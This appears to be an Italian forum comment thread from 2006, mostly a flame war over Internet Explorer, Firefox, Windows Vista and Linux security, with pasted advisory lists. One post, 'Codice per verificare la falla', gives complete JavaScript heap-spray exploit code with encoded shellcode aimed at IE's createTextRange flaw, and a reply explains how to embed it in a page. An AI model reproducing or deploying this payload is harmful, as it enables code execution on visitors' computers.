- Scritto da: Anonimo> > - Scritto da: TrollSpammer> > e io dovrei cambiare firefox per exploder???> > si certo come no!!> > stai certo che di falle ci sono anche per il tuo> amico firefox. La differenza sta nel fatto che> non le sbandierano ai quattro venti ma> puntualmente ad ogni versione i buffer overflow e> l'esecuzione di codice c'è sempre:> > Fixed in Firefox 1.5.0.1> MFSA 2006-08 "AnyName" entrainment and access> control hazard> MFSA 2006-07 Read beyond buffer while parsing XML> MFSA 2006-06 Integer overflows in E4X, SVG and> Canvas> MFSA 2006-05 Localstore.rdf XML injection through> XULDocument.persist()> MFSA 2006-04 Memory corruption via QueryInterface> on Location, Navigator objects> MFSA 2006-03 Long document title causes startup> denial of Service> MFSA 2006-02 Changing postion:relative to static> corrupts memory> MFSA 2006-01 JavaScript garbage-collection hazards> > Fixed in Firefox 1.0.7> MFSA 2005-59 Command-line handling on Linux> allows shell execution> MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12> Vulnerability Fixes> MFSA 2005-57 IDN heap overrun using soft-hyphens> > Fixed in Firefox 1.0.5/1.0.6> MFSA 2005-56 Code execution through shared> function objects> MFSA 2005-55 XHTML node spoofing> MFSA 2005-54 Javascript prompt origin spoofing> MFSA 2005-53 Standalone applications can run> arbitrary code through the browser> MFSA 2005-52 Same origin violation: frame calling> top.focus()> MFSA 2005-51 The return of frame-injection> spoofing> MFSA 2005-50 Exploitable crash in> InstallVersion.compareTo()> MFSA 2005-49 Script injection from Firefox> sidebar panel using data:> MFSA 2005-48 Same-origin violation with> InstallTrigger callback> MFSA 2005-47 Code execution via "Set as Wallpaper"> MFSA 2005-46 XBL scripts ran even when Javascript> disabled> MFSA 2005-45 Content-generated event> vulnerabilities> > Fixed in Firefox 1.0.4> MFSA 2005-44 Privilege escalation via non-DOM> property overrides> MFSA 2005-43 "Wrapped" javascript: urls bypass> security checks> MFSA 2005-42 Code execution via javascript:> IconURL> > Fixed in Firefox 1.0.3> MFSA 2005-33 Javascript "lambda" replace exposes> memory contents> MFSA 2005-34 javascript: PLUGINSPAGE code> execution> MFSA 2005-35 Showing blocked javascript: popup> uses wrong privilege context> MFSA 2005-36 Cross-site scripting through global> scope pollution> MFSA 2005-37 Code execution through javascript:> favicons> MFSA 2005-38 Search plugin cross-site scripting> MFSA 2005-39 Arbitrary code execution from> Firefox sidebar panel II> MFSA 2005-40 Missing Install object instance> checks> MFSA 2005-41 Privilege escalation via DOM> property overrides> > Fixed in Firefox 1.0.2> MFSA 2005-32 Drag and drop loading of privileged> XUL> MFSA 2005-31 Arbitrary code execution from> Firefox sidebar panel> MFSA 2005-30 GIF heap overflow parsing Netscape> extension 2> > Fixed in Firefox 1.0.1> MFSA 2005-29 Internationalized Domain Name (IDN)> homograph spoofing> MFSA 2005-28 Unsafe /tmp/plugtmp directory> exploitable to erase user's files> MFSA 2005-27 Plugins can be used to load> privileged content> MFSA 2005-26 Cross-site scripting by dropping> javascript: link on tab> MFSA 2005-25 Image drag and drop executable> spoofing> MFSA 2005-24 HTTP auth prompt tab spoofing> MFSA 2005-23 Download dialog source spoofing> MFSA 2005-22 Download dialog spoofing using> Content-Disposition header> MFSA 2005-21 Overwrite arbitrary files> downloading .lnk twice> MFSA 2005-20 XSLT can include stylesheets from> arbitrary hosts> MFSA 2005-19 Autocomplete data leak> MFSA 2005-18 Memory overwrite in string library> MFSA 2005-17 Install source spoofing with> user:pass@host> MFSA 2005-16 Spoofing download and security> dialogs with overlapping windows> MFSA 2005-15 Heap overflow possible in UTF8 to> Unicode conversion> MFSA 2005-14 SSL "secure site" indicator spoofing> MFSA 2005-13 Window Injection Spoofing> > Fixed in Firefox 1.0> MFSA 2005-12 javascript: Livefeed bookmarks can> steal private data> MFSA 2005-09 Browser responds to proxy auth> request from non-proxy ssl server> MFSA 2005-08 Synthetic middle-click event can> steal clipboard contents> MFSA 2005-07 Script-generated event can download> content without prompting> MFSA 2005-05 Input stealing from other tabs> MFSA 2005-04 Secure site lock can be spoofed> using view-source:> MFSA 2005-03 Secure site lock can be spoofed by a> binary download> MFSA 2005-02 Opened attachments are temporarily> saved world-readable> MFSA 2005-01 Link opened in new tab can load> local file> Finalmente uno che gliela canta giusta!!!!!!!!!!AnonimoRe: AH AH AH EXPLODERBUG
- Scritto da: Anonimo> > - Scritto da: Anonimo> > > > - Scritto da: TrollSpammer> > > e io dovrei cambiare firefox per exploder???> > > si certo come no!!> > > > stai certo che di falle ci sono anche per il tuo> > amico firefox. La differenza sta nel fatto che> > non le sbandierano ai quattro venti ma> > puntualmente ad ogni versione i buffer overflow> e> > l'esecuzione di codice c'è sempre:> > > > Fixed in Firefox 1.5.0.1> > MFSA 2006-08 "AnyName" entrainment and [cut]> > Fixed in Firefox 1.0.7> > MFSA 2005-59 Command-line handling on Linux[cut]> > Fixed in Firefox 1.0.5/1.0.6> > MFSA 2005-56 Code execution through shared[cut]> > Fixed in Firefox 1.0.4> > MFSA 2005-44 Privilege escalation via non-DOM[cut]> > Fixed in Firefox 1.0.3> > MFSA 2005-33 Javascript "lambda" replace [cut]> > Fixed in Firefox 1.0.1> > MFSA 2005-29 Internationalized Domain Name [cut]> > Fixed in Firefox 1.0> > MFSA 2005-12 javascript: Livefeed bookmarks can[cut]> > Finalmente uno che gliela canta giusta!!!!!!!!!!Do you know the italian translation of FIXED?AnonimoRe: AH AH AH EXPLODERBUG
A volte voi winari mi sorprendete. Vi ritenete superesperti e poi vi fregate cosi?Quelle sono vulnerabilita' CORRETTE ... NON CI SONO PIU'. Conta e riporta invece quelle presenti e NON correte e poi ne riparliamo ... confrontandole anche con quelle di IE.SalutiAnonimoAl solito.. l'inganno
Fanno programmi colabrodo .. non a caso.L'obbiettivo è semplicissimo."ci spiace IE 6 è un colabrodo però potete passare a IE7 presto che è molto più sicuro".A lungo andare anche IE7 risulterà non più sicuro e sarà necessario di IE8.Ma veniamo al problema vero..Per installare IE7 ci vuole XP SP2.Per installare IE8 quando uscirà ci vorrà Vista.E così continuando vi COSTRINGERANNO per essere SICURI e navigare COME SI DEVE ad aggiornare sistema operativo e ovviamente id conseguenza il pc.PagareeeeeeeeeAnonimoRe: Al solito.. l'inganno
ti quoto anche citando msn messenger.msn messenger 7? 2k/xp!msn messenger 7.5? solo xp!curioso però che sono riusciti, modificando qualcosa, a farlo andare su 2k...oh! vuoi dirmi che era totalmente compatibile con 2k, ma han deciso di non farlo andare apposta?mi son rotto con sta mania del "ti obbligo ad aggiornare a sp2/xp/vista/altro.." se vuoi continuare a usare questo programma aggiornato...un colpettino di qua (msn 7.5), un colpettino di la (ie 7)...magari msn 8 chiederà sp2...AnonimoRe: Al solito.. l'inganno
- Scritto da: Anonimo> ti quoto anche citando msn messenger.> > msn messenger 7? 2k/xp!> msn messenger 7.5? solo xp!> > curioso però che sono riusciti, modificando> qualcosa, a farlo andare su 2k...oh! vuoi dirmi> che era totalmente compatibile con 2k, ma han> deciso di non farlo andare apposta?>Chiaro che sia così..Era totalmente compatibile, solo che hanno fatto qualche check stupido per obbligare la gente.> > > mi son rotto con sta mania del "ti obbligo ad> aggiornare a sp2/xp/vista/altro.." se vuoi> continuare a usare questo programma aggiornato...> fai come me.. impara a usare Linux o pensa a passare a Mac.> un colpettino di qua (msn 7.5), un colpettino di> la (ie 7)...magari msn 8 chiederà sp2...msn8 magari chiederà vista? :Pforse no.. magari l'8.5 si :PAnonimoRe: Al solito.. l'inganno
- Scritto da: Anonimo> un colpettino di qua (msn 7.5), un colpettino di> la (ie 7)...magari msn 8 chiederà sp2...Aggiornamenti necessari, indispensabili che denotano serietà e alta professionalità degli ingegneri al servizio di M$. Windows non è mica in scatola di montaggio da montare e smontare a piacimento in cantina come fanno i linari con il loro linusux....Mwhahahahah!TrollfighterRe: Al solito.. l'inganno
- Scritto da: Trollfighter> > - Scritto da: Anonimo> > > un colpettino di qua (msn 7.5), un colpettino di> > la (ie 7)...magari msn 8 chiederà sp2...> > Aggiornamenti necessari, indispensabili che> denotano serietà e alta professionalità degli> ingegneri al servizio di M$. >Windows non è mica> in scatola di montaggio da montare e smontare a> piacimento in cantina come fanno i linari con il> loro linusux....> Mwhahahahah!quelli che ti costringono di fatto a cambiare PC.Si che professionalità..PAGAREAnonimoRe: Al solito.. l'inganno
- Scritto da: Anonimo> Fanno programmi colabrodo .. non a caso.> L'obbiettivo è semplicissimo.> "ci spiace IE 6 è un colabrodo però potete> passare a IE7 presto che è molto più sicuro".> A lungo andare anche IE7 risulterà non più sicuro> e sarà necessario di IE8.> Ma veniamo al problema vero..> Per installare IE7 ci vuole XP SP2.> Per installare IE8 quando uscirà ci vorrà Vista.> E così continuando vi COSTRINGERANNO per essere> SICURI e navigare COME SI DEVE ad aggiornare> sistema operativo e ovviamente id conseguenza il> pc.> Pagareeeeeeeeeche ragionamento del menga... se non vuoi passare al prossimo IE/windows usa le alternative.AnonimoRe: Al solito.. l'inganno
> che ragionamento del menga... se non vuoi passare> al prossimo IE/windows usa le alternative.infatti uso Gnu/LinuxAnonimoRe: Al solito.. l'inganno
- Scritto da: Anonimo> > > che ragionamento del menga... se non vuoi> passare> > al prossimo IE/windows usa le alternative.> > infatti uso Gnu/Linux>E allora perchè vuoi pagare. Mah.Anonimo5 --
Anonimo[OT] VISTA : dovremo riscriverne il 60%
LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!60% Of Windows Vista Code To Be RewrittenDavid Richards - Friday, 24 March 2006 Up to 60% of the code in the new consumer version of Microsoft new Vista operating system is set to be rewritten as the Company "scrambles" to fix internal problems a Microsoft insider has confirmed to SHN.http://www.smarthouse.com.au/Computing/Platforms?Article=/Computing/Platforms/R7G5G6U4AnonimoRe: [OT] VISTA : dovremo riscriverne il
- Scritto da: Anonimo> > LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!> > 60% Of Windows Vista Code To Be RewrittenNon è una buona notizia ne per windows XP ne per vista. Riscrivere il 60% del codice significa che:1) nei precedenti windows il codice fa schifo2) avremmo un Vista bello nuovo, ma potenzialmente buggato.AnonimoXP dovrebbero scontartelo del 60%?
- Scritto da: Anonimo> > - Scritto da: Anonimo> > > > LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!> > > > 60% Of Windows Vista Code To Be Rewritten> > Non è una buona notizia ne per windows XP ne per> vista. Riscrivere il 60% del codice significa> che:> 1) nei precedenti windows il codice fa schifo> 2) avremmo un Vista bello nuovo, ma> potenzialmente buggato.Quindi XP dovrebbero scontartelo del 60% per 'vizi' del prodotto?AnonimoRe: [OT] VISTA : dovremo riscriverne il
- Scritto da: Anonimo> > - Scritto da: Anonimo> > > > LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!> > > > 60% Of Windows Vista Code To Be Rewritten> > Non è una buona notizia ne per windows XP ne per> vista. Riscrivere il 60% del codice significa> che:> 1) nei precedenti windows il codice fa schifo> 2) avremmo un Vista bello nuovo, ma> potenzialmente buggato.oppure potresti prima leggere la news suddettaAnonimoRe: [OT] VISTA : dovremo riscriverne il
- Scritto da: Anonimo> > LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!> > 60% Of Windows Vista Code To Be RewrittenLa notizia è falsa.UPDATE: This story has been proven to be false. More on this from the Scobleizerhttp://scobleizer.wordpress.com/2006/03/24/where-the-heck-is-scoble/AnonimoVAUTA I FATTI !!!!!
Grazie PI per ricordare sempre a chi si collega,tramite un'apposito banner, che occorre VALUTAREI FATTI, riguardo alla fuffa di quell'azienda markettaradella microsfottoVALUTA I FATTI !!!!Enormi somme di denaro buttate via in presuntasicurezza, che non serve assolutamente a nulla inquanto un giorno si e uno no escono exploit cheverranno patchati dopo intere settimane !!Pazzesco. E pazzi sono quelli che usano questeschifezze, per incompetenza patentataAnonimoRe: VAUTA I FATTI !!!!!
> Io ripeto sempre che un software sicuro non e' un> software che non ha falle, ma un software> supportato da persone o aziende o comunita' che> correggano le falle nel + breve tempo possibile.> Piu' e' minore questo tempo + un software puo'> considerarsi sicuro.> Voi cosa ne pensate ?che hai assolutamente ragione, un sw completamente senza bug è quasi impossibile da immaginare, ma se viene fixato appena scoperto il bug (ah, che non sia dopo anni :D) beh, in quel caso mi sembra "ok" :|AnonimoRe: VAUTA I FATTI !!!!!
Forse Microsoft capirà che si deve dedicare a quelle cagate della Xbox e al Media center e lasciare il lavoro serio a Linux.AnonimoROTFL
- Scritto da: Anonimo> lasciare il lavoro serio a Linux.Linuc$ è tutto meno che serio :pAnonimoRe: VAUTA I FATTI !!!!!
- Scritto da: Anonimo> Forse Microsoft capirà che si deve dedicare a> quelle cagate della Xbox e al Media center e> lasciare il lavoro serio a Linux.Linux non è un'azienda,Linux non produce hardware,Linux non produce innovazione,Linux non è afflitto dai problemi di Windows perchè non hai mai avuto il coraggio di proporsi come seria alternativa al prodotto commerciale,Linux vive di riflesso, alle spalle di M$ e dei produttori di hardware,Linux è tutto questo è tanto altro, ma di sicuro non è una cosa seria.Mwahahahahaha!TrollfighterRe: VAUTA I FATTI !!!!!
- Scritto da: Trollfighter> > Forse Microsoft capirà che si deve dedicare a> > quelle cagate della Xbox e al Media center e> > lasciare il lavoro serio a Linux.> > Linux non è un'azienda,ma la RedHat si (giusto per citarne una), così come tutte le aziende che forniscono consulenza... perché OK che Linux è meglio, ma se non lo sai configurare a modo può lasciare aperte porte più grosse dei bug di UinDOS> Linux non produce hardware,neanche MS in senso stretto> Linux non produce innovazione,beh... qui avrei qualcosa da ridire...> Linux non è afflitto dai problemi di Windows> perchè non hai mai avuto il coraggio di proporsi> come seria alternativa al prodotto commerciale,Linux non è un prodotto commerciale, e non può proporsi come tale.> Linux vive di riflesso, alle spalle di M$ e dei> produttori di hardware,seee... non esageriamo... Linux vivrebbe benissimo anche se non esistesse MS, anche se bisogna riconoscere che a livello di GUI Linux ha molto copiato tanto da Win quanto da Mac, e purtroppo molto sw per Linux non esiste (non è un caso l'utilizzo di wine)> Linux è tutto questo è tanto altro, ma di sicuro> non è una cosa seria.Sarebbe bello se ci spieghi la tua concezione di serietàciaoPS: non so né pro né contro Linux... mi piace sapere che esistono alternativeAnonimoRe: VAUTA I FATTI !!!!!
In che senso i FATTI?I FATTI, nel senso di quelli che vedono sicurezza, serenità, stabilità, e tante altre cose che vedono solo loro?Io sono due giorni che gli chiedo di cosa si fanno, per poter valutare meglio, ma non mi rispondono.Come faccio a valutare i FATTI se non mi si danno elementi per una valutazione seria e approfondita?FATTI... fatevi avanti e diteci di cosa vi fate!!!AnonimoLinux forever!!!
Altro che le cacate microsoft.Anonimovalanga di falle per linux
quante vulnerabilità ci sono state per linux questo mese?Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044 Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283 Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076 Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955 Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902 Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365 Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609 Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785 Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967 Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203 Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993 ecc. ecc.AnonimoRe: valanga di falle per linux
NON E' VERO, sono informazioni false. LINUX SEMPRE FOREVER!- Scritto da: Anonimo> > quante vulnerabilità ci sono state per linux> questo mese?> > Linux Kernel SDLA IOCTL Unauthorized Local> Firmware Access Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16304 > > Linux Kernel DM-Crypt Local Information> Disclosure Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16301 > > Linux Kernel Sysctl_String Local Buffer Overflow> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16141 > > Linux Kernel ProcFS Kernel Memory Disclosure> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16284 > > Linux Kernel IP6_Input_Finish Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16043 > > Linux Kernel Time_Out_Leases PrintK Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15627 > > Linux Kernel ICMP_Push_Reply Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16044 > > Linux Kernel handle_stop_signal Denial of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16856 > > Linux Kernel IPv6 FlowLable Denial Of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15729 > > Linux Kernel PTraced Child Auto-Reap Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15625 > > Linux Kernel PTrace CLONE_THREAD Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15642 > > Linux Kernel SET_MEMPOLICY Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16135 > > Linux Kernel mq_open System Call Unspecified> Denial of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16283 > > Linux Kernel Console Keymap Local Command> Injection Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15122 > > Linux Kernel Multiple Memory Leak Local Denial Of> Service Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15076 > > Linux Orinoco Driver Remote Information> Disclosure Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15085 > > Linux Kernel USB Subsystem Local Denial Of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14955 > > Linux Kernel Multiple Security Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15049 > > Linux Kernel 64-Bit SMP Routing_ioctl() Local> Denial of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14902 > > Linux Kernel IPV6 Local Denial of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15156 > > Linux Kernel SCSI ProcFS Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14790 > > Linux Kernel Sysctl Unregistration Local Denial> of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15365 > > Linux Kernel IPSec Policies Authorization Bypass> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14609 > > Linux Kernel ISO File System Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14614 > > Linux Kernel Sendmsg() Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14785 > > Linux Kernel Multiple Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/12598 > > Linux Kernel Coda_Pioctl Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14967 > > Linux Kernel USB io_edgeport Driver Local Integer> Overflow Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/12102 > > Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory> Disclosure Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/17203 > > Linux Kernel die_if_kernel Local Denial of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/16993 > > ecc. ecc.AnonimoRe: valanga di falle per linux
- Scritto da: Anonimo> > quante vulnerabilità ci sono state per linux> questo mese?Impara prima a leggere, buffone!AnonimoRe: valanga di falle per linux
come ti ho gia' scritto da qualche altra parte l'elenco che riporti ... ti fa perdere di credibilita'. Hai detto scemenze e quello che dici conferma la bonta' di Linux ...Mah... quanta ignoranzaAnonimoRe: valanga di falle per linux
e' un bene che ci siano. Questo significa che se sono state trovate:1) molta gente lo usa2) sono state immediatamente correte e quindi non ci sono piu' ... maggior sicurezza3) OS migliore di CSAncora non te ne sei reso conto e fai figurine di merda? ... potresti comprare anche l'album per attaccarcele e ricordartele.AnonimoRe: peccato che la versione 7
- Scritto da: lalla63[cut]> Questo con explorer, ed in genere con i prodotti> sviluppati da società commerciali di software,> tende a non succedere.Proprio Microsoft non ha garantito la compatibilità tra versioni successive dei propri programmi: slides fatte con power point 2k che con XP si perdevano i link, impaginazioni da rifare da word 97 a XP eccetera eccetera....Per non parlare dei "database" di access....AnonimoRe: peccato che la versione 7
ma microsoft è microsoft, e certe cose la gente le "lascia passare"...se però è un altro sw no eh, vietato!AnonimoCodice per verificare la falla
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +"%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); slackspace = 20 + shellcode.length while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length + slackspace < 0x40000) block = block + block + fillblock; memory = new Array(); for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode; var r = document.getElementById('blah').createTextRange();AnonimoRe: Codice per verificare la falla
Ovviamente il codice deve stare tra due tag script, e all'inizio deve esserci una checkbox:input type="checkbox" id="blah"Anonimo:DDDDDDDDDDDDDDDDD
L'articolo si commenta da se..HAHAHAHAHAHAHAHHAHHHAHAche Circo Togni che sono!AnonimoRe: peccato che la versione 7
- Scritto da: Anonimo> > Ma che ca****e dici ?????proprio quello che mi stavo domandando io, leggendo il mio quote! :DAnonimoI troll linari sono scatenati!
cdorosicate, rosicate...finchè potrete farlo; perchè è in Vista una rivoluzione dell'intero comparto IT, che insabbierà tutti i sistemi operativi linari del pianeta!(win)AnonimoRe: I troll linari sono scatenati!
- Scritto da: Anonimo> cdo> > rosicate, rosicate...finchè potrete farlo; perchè> è in Vista una rivoluzione dell'intero comparto> IT, che insabbierà tutti i sistemi operativi> linari del pianeta!> > (win)tu manco sai cos'è it(c64)(amiga)(apple)(linux)AnonimoRe: I troll linari sono scatenati!
- Scritto da: Anonimo> cdo> > rosicate, rosicate...finchè potrete farlo; perchè> è in Vista una rivoluzione dell'intero comparto> IT, che insabbierà tutti i sistemi operativi> linari del pianeta!> > (win)si ho una paura ma cos'ì tantahttp://www.smarthouse.com.au/Computing/Platforms?Article=/Computing/Platforms/R7G5G6U4che puoi verificare su questo link sopra.Ovvero devono riscrivere il 60% del sistema operativo :DOh si una rivoluzione!!!La storia non è cambiata.. Bug a go goAnonimoRe: I troll linari sono scatenati!
- Scritto da: Anonimo> Oh si una rivoluzione!!!> La storia non è cambiata.. Bug a go goEh ci saranno i bug, ma qualcuno ha il coraggio di reinventare, rinnovare e proporre, voi linari siete sempre li in cantina sotto tre dita di muffa col vostro catorcio di commodore 64 a manovella che giocate a omega race.Mwahahahah!TrollfighterRe: I troll linari sono scatenati!
> Eh ci saranno i bug, ma qualcuno ha il coraggio> di reinventare, rinnovare e proporre, voi linari> siete sempre li in cantina sotto tre dita di> muffa col vostro catorcio di commodore 64 a> manovella che giocate a omega race.> Mwahahahah!Fa ridere come dobbiate offendere per riuscire a dimostrare quanto sia migliore quel prodotto inventando storielle da troll :)AnonimoRe: I troll linari sono scatenati!
- Scritto da: Trollfighter> > - Scritto da: Anonimo> > > Oh si una rivoluzione!!!> > La storia non è cambiata.. Bug a go go> > Eh ci saranno i bug, ma qualcuno ha il coraggio> di reinventare, rinnovare e proporre, voi linariBWHAHAHA, un'altro cabarettista! Dai che forse con vista non ci sara' piu' bisogno del defrag, con winfs... errSo che sei un troll, ma potevi essere piu' creativo, microsoft non ha mai innovato niente, e' sempre arrivata dove il mercato era gia' maturo, ha comprato un prodotto e l'ha rivenduto come proprio: excel, powerpoint, ms bob, ah no, quest'ultimo non l'ha comprato, l'ha creato in casa... (-;> siete sempre li in cantina sotto tre dita di> muffa col vostro catorcio di commodore 64 a> manovella che giocate a omega race.> Mwahahahah!Retrocoputing rulez!Il mio C64 ce l'ho ancora, ma non si accende piu' (boot mi pare una parola grossa), l'ultima volta si era bruciato il chip video (VIC)...AnonimoRe: I troll linari sono scatenati!
- Scritto da: Anonimo> rosicate, rosicate...finchè potrete farlo; perchè> è in Vista una rivoluzione dell'intero comparto> IT, che insabbierà tutti i sistemi operativi> linari del pianeta!- Windows 95 insabbierà tutti i sistemi operativi ...- Windows 98 insabbierà tutti i sistemi operativi ...- Windows ME insabbierà tutti i sistemi operativi ...- Windows 2K insabbierà tutti i sistemi operativi ...- Windows XP insabbierà tutti i sistemi operativi ...- Windows Vista insabbierà tutti i sistemi operativi ...Developers, developers, developers !!YAAAWWWNNN :-o !!!GiamboRe: I troll linari sono scatenati!
Non e' questione di maturita' o meno.E' questione di mercato ... e di monopoli.Un utonto che acquista un PC con Windows preinstallato ... non sapra' mai che esistono validissime alternative.Microsoft puo' farsi pubblicita' e lo fa ... Linux avanza comunque.Le statistiche dello 0.3% sono inoltre false. Non e' possibile stabilire la diffusione di Linux ... non esiste mercato per quello nel senso che non lo acquisti (redhat e suse escluse) ... ma scarichi una distribuzione e la installi senza dire niente a nessuno ... e nessuno lo sa'.Da quello che posso vedere io (lavoro con laureati, ingegneri e professionisti) ... lo 0.3% si vede con Windows.Ma a differenza degli utonti noi conosciamo e possiamo sfuggire alle regole del mercato. Un utonto e' obbligato ad acquistare Windows ... alla faccia di un libero mercato che non c'e' e ad una liberta' di scelta che non c'e'.Lo sai a cosa si va incontro se acquisti un portatile e non vuoi pagare Windows?Immagino di no ... e non e' questione di volere tutto gratis ... e' questione di volere un prodotto valido.Ma queste cose e difficile spiegarle ad uno che non conosce la materia.Io (con tutto il rispetto) fossi in te tornerei a giocare e a stare zitto.Saluti.robadamattiRe: I troll linari sono scatenati!
- Scritto da: Anonimo> Così parlò un linaro.Certo che voi Windowsauri avete una fantasia ... Solo copiare gli altri sapete fare, eh :) ?GiamboRe: I troll linari sono scatenati!
- Scritto da: Giambo> > - Scritto da: Anonimo> > > Così parlò un linaro.> > Certo che voi Windowsauri avete una fantasia ...> Solo copiare gli altri sapete fare, eh :) ?Perche' linux cosa ha portato di nuovo?AnonimoRe: I troll linari sono scatenati!
